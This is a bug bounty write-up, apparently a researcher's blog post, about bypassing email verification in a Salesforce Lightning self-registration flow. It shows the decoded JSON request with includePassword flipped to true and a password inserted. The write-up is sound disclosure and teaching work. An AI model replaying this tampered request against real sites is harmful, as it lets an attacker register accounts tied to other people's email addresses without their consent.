Hello friends, This is Prasanth Elangovan (aka Virtuvil) , a security researcher & an ethical hacker from India.
Note: Sometimes It will hit you differently when you know your report is valid, but it will still be informative :)
Normally, I don’t submit high-impact bugs to programmes blindly; instead, I wait for responses to low-impact bugs before reporting high-impact bugs. If the programme does not replay. I simply ignore the programme.
I received a private invitation from hackerone, let’s call it xyz.com. I made the decision to start testing the site. It’s time for the red beast to emerge :)
I did port scanning, searched for Directory listing, and tried to find SQLi, but I couldn’t find anything. On that day, I encounter no bugs. The following day, I intended to test the authentication bypass vulnerability.
Flow of the Registration process: When creating an account, we only need to provide our name, email address, and company name. After clicking the sign-up button. It simply sends a password-setting email. Only after clicking the link will we be able to set the password. This is being done for security reasons. As a result, only the account’s owner can create an account with his/her account. This is the working flow of the application.
While registering an account, I noticed a parameter called message. The real game begins here !
It’s encoded. So, I used URL decoding to decode the message parameter. After decoding the message parameter, it appears as follows.
{“actions”:[{“id”:”258;a”,”descriptor”:”apex://LightningSelfRegisterController/ACTION$selfRegister”,”callingDescriptor”:”markup://c:selfRegisterCustom”,”params”:{“firstname”:”Prasanth”,”lastname”:”Elangovan”,”email”:”prasanth@victimdomain.com”,”password”:”",”confirmPassword”:”",”regConfirmUrl”:”./CheckPasswordResetEmail”,”extraFields”:”[{\”dbRequired\”:false,\”fieldPath\”:\”CountryCode\”,\”label\”:\”Country Code\”,\”required\”:false,\”type\”:\”PICKLIST\”,\”value\”:\”US\”},{\”dbRequired\”:false,\”fieldPath\”:\”ACM_Promotional_Updates__c\”,\”label\”:\”ACM Promotional Updates\”,\”required\”:false,\”type\”:\”Boolean\”,\”value\”:true}]”,”startUrl”:””,”includePassword”:false}}]}
The Itachi inside of me is only focused on each parameter. I noticed a variable called includePassword:false at that message parameter, and the request also contains the null password value.
It’s time to include those passwords and continue my testing. So I entered random password on password and the confirm password. Then I changed the value of include password to true. Then I encode this message parameter and replace it with the message parameter before forwarding it.
The modified decoded request now appears as follows:
{“actions”:[{“id”:”258;a”,”descriptor”:”apex://LightningSelfRegisterController/ACTION$selfRegister”,”callingDescriptor”:”markup://c:selfRegisterCustom”,”params”:{“firstname”:”Prasanth”,”lastname”:”Elangovan”,”email”:”prasanth@victimdomain.com”,”password”:”Password@123",”confirmPassword”:”Password@123",”regConfirmUrl”:”./CheckPasswordResetEmail”,”extraFields”:”[{\”dbRequired\”:false,\”fieldPath\”:\”CountryCode\”,\”label\”:\”Country Code\”,\”required\”:false,\”type\”:\”PICKLIST\”,\”value\”:\”US\”},{\”dbRequired\”:false,\”fieldPath\”:\”ACM_Promotional_Updates__c\”,\”label\”:\”ACM Promotional Updates\”,\”required\”:false,\”type\”:\”Boolean\”,\”value\”:true}]”,”startUrl”:””,”includePassword”:true}}]}
I’ve now gotten 200 OK responses. The account was created successfully without any user interaction. Now I have complete control of the account.
I became incredibly excited. Now I’ve submitted the entire report with all of the details to hackerone. On this one, I have great expectations. :)
I received a response after five days. Yeah, the bug has been marked as informative. For me, it appears shocked.
Its not even duplicate. Its informative. :)
As I previously stated, it may hit you differently when you know your report is valid, but it will still be informative :)
I have few other reports as well which have high impact but closed as informative. But that’s okay. Learning is also important.
Thank you for reading this far. Please DM if you have any questions.
Contact : Linkedin
